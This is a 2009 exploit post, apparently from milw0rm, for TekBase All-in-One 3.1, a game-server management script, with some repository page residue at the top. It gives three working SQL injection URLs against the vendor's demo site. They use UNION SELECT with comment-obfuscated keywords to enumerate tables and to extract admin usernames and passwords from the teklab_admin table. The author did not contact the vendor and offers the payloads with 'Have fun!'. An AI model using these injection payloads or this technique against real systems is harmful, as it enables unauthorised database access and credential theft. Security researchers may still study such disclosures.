37 lines
No EOL
1.6 KiB
Text
37 lines
No EOL
1.6 KiB
Text
############################
|
|
# Author: n3wb0ss
|
|
# Date: 15/06/09
|
|
# Contact: n3wboss@Safe-mail.net
|
|
############################
|
|
# Software: TekBase All-in-One 3.1
|
|
# Vendor: tekbase.de
|
|
# Example: http://demo.tekbase.de/
|
|
# Vendor contacted: No
|
|
# Risk: High
|
|
############################
|
|
# I found this website on a german board, looking for another script.
|
|
# Looks to me, like a Gameserver,TS-Server,Whatever-Server-Managing Script. No matter...
|
|
# It's vuln I found a lot more, but I decided to release just two examples to the public.
|
|
# U need accessdate, you can get them for demo on tekbase.de (Admin&Customer-Login)
|
|
############################
|
|
# Here it is (adminaccess needed):
|
|
# Unfortunately I can't provide any sourcecode of this shit... it's closed source crap. But I think it should be easy to get it :P
|
|
# Have fun!
|
|
# POC:
|
|
http://demo.tekbase.de/admin.php?op=adminSupport&zahl=0&torder=&tcounter=15&ids=99991%27/**/unIon/**/Select/**/1,2,3,4,CONCAT(unhex(hex(TABLE_NAME))),6,7,8,9,10,11/**/frOM/**/INFORMATION_SCHEMA.COLUMNS/**/liMIT/**/-1/*
|
|
|
|
############################
|
|
# Second one( just be a member):
|
|
# POC:
|
|
http://demo.tekbase.de/members.php?op=membersBills&y=-2007%27/**/unION/**/SeleCT/**/1,TABLE_NAME,3,4,5,6,7,8/**/FroM/**/INFORMATION_SCHEMA.TABLES/*
|
|
http://demo.tekbase.de/members.php?op=membersBills&y=-2007%27/**/unION/**/SeleCT/**/1,group_concAT(admin,0x3a,password),3,4,5,6,7,8/**/FroM/**/teklab_admin/*
|
|
|
|
############################
|
|
# As said before, just 2 of many vulns
|
|
#
|
|
#
|
|
# H4ppy Gr33tinGs to the only On3
|
|
#
|
|
###########################
|
|
|
|
# milw0rm.com [2009-06-17] |